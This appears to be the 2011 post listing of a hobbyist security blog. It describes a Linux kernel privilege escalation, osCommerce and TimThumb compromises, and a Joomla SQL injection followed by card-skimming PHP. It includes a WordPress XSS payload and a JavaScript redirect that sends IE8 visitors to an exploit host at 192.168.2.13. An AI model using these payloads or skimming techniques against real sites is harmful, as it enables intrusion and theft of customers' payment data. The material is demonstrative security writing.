Posts

Showing posts from 2011

Ubuntu Server Exploit (Local Privilege Escalation)

Image
Today we're gonna talk about an "old" vulnerability discovered by Dan Rosenberg in the linux kernel. This bug affect versions previous than 2.6.38 and permit to an user with low privileges to gain root access. Link to exploit: Linux Kernel<= 2.6.37 Local Privilege Escalation   The text below is taked from exploit description. * This exploit leverages three vulnerabilities to get root, all of which were * discovered by Nelson Elhage: * * CVE-2010-4258 * ------------- * This is the interesting one, and the reason I wrote this exploit. If a * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL * word will be written to a user-specified pointer when that thread exits. * This write is done using put_user(), which ensures the provided destination * resides in valid userspace by invoking access_ok(). However, Nelson * discovered that when the kernel performs an address limit override via * set_fs(KERNEL_DS) and the thread subsequen

Have fun with scammers

Image
A couple of days ago i've received this e-mail: After reading it i decided to go on and have some fun with him so i've replied and after one day i get the response. To convince me he attached four pictures regarding the flat. Here is the living room and my future bedroom.               Anyone can see that this picture is from a five stars hotel but to be really sure i used google search by image and what i found ? that these images are from an hotel in the center of Milan. Things are getting interesting so i decided to know how can i get this awesome flat. His response. Now it's time to send him my personal information in a pdf. After this e-mail i haven't got any response, maybe he is angry with me but i don't know why :(.

Wordpress XSS Vulnerability + IE 8 Exploit

Image
The 30th December of 2010 a guy named sneak reported a persistent XSS vulnerability that affect the popular blog cms wordpress <= 3.0.3. The problem is located into the kses.php file which is the HTML sanitation library. If we type a link with the href attribute written in capital letters this library don't filter the content properly. Example: <a HREF="javascript:alert(0)">CLICK HERE</a> If we post a comment this tag will be accepted as a common link. With this vulnerability we can craft a piece of code that can steal cookies, redirected to other sites etc.... This video shows you how it can be easy for everyone to craft an evil comment to redirect the victim to a server where there is an exploit for Internet Explorer 8 ( CVE-2010-3971 ). Our evil code: var s = navigator.userAgent; if( s.search('MSIE 8.0') != -1 ) { window.location = "http://192.168.2.13:8080/news"; } Reference and more detailed information: - Sneak

OsCommerce Malware Infection

Image
Three months ago is started a huge site infection campaign with lens oscommerce, a famous cms for medium/little on-line stores. This cms suffers of few vulnerabilities that can lead an attacker to upload files and execute remote code. Vulnerabilities: -   osCommerce 2.2 Remote File Upload Vulnerability -   osCommerce authentication bypass -   osCommerce 2.2 Arbitrary PHP Code Execution -   osCommerce 2.3.1 Remote File Upload Vulnerability Today (4/10/2011) the total number of infected sites is 830,000 but two months ago was 8 million. In some compromised sites the attacker has left the webshell. After uploading a backdoor the attacker edit the home page and add a script/iframe tag that load multiple browser exploits. Exploits used: - IE 6 Remote Code Execution - Java Runtime Environment Remote Code Execution Vulnerability - Microsoft Windows Help - Adobe Reader and Acrobat 8.x After successful exploitation a malware is downloaded and executed. V

Wordpress TimThumb Exploit (Remote Code Execution)

Image
A lot of wordpress themes use timthumb script to resize images. From version 1.15 to 1.33 timthumb allows external domains such as flickr.com to display remote images on your website . More detailed information here: - Wordpress timthum hack - Zero Day vulnerability in many wordpress themes Resources: - TimThumb version used - Vulnerable wordpress theme - List of vulnerable wordpress themes

Joomla Plugin Exploit + PHP Malware

Image
Garden Store has a vulnerable version (1.1.7) of virtuemart (Joomla plugin) and through a blind sql injection we can retrieve administrator credentials. We edit the main template and place into the footer tag a simple piece of code properly obfuscated to get user's credit cards data. Reference: - virtuemart exploit found by TecR0c & mr_me - joomla hash cracker - php obfuscator - dopost  source code - getcc source code

Why this blog

Image
Hi People, I've decide to open this blog because not always i can explain all thought a video and the relative description box. Remember... i'm NOT an expert or a regular blogger and i make videos only for fun. I have also a twitter account @SecObscurity . See you soon. ~SecurityObscurity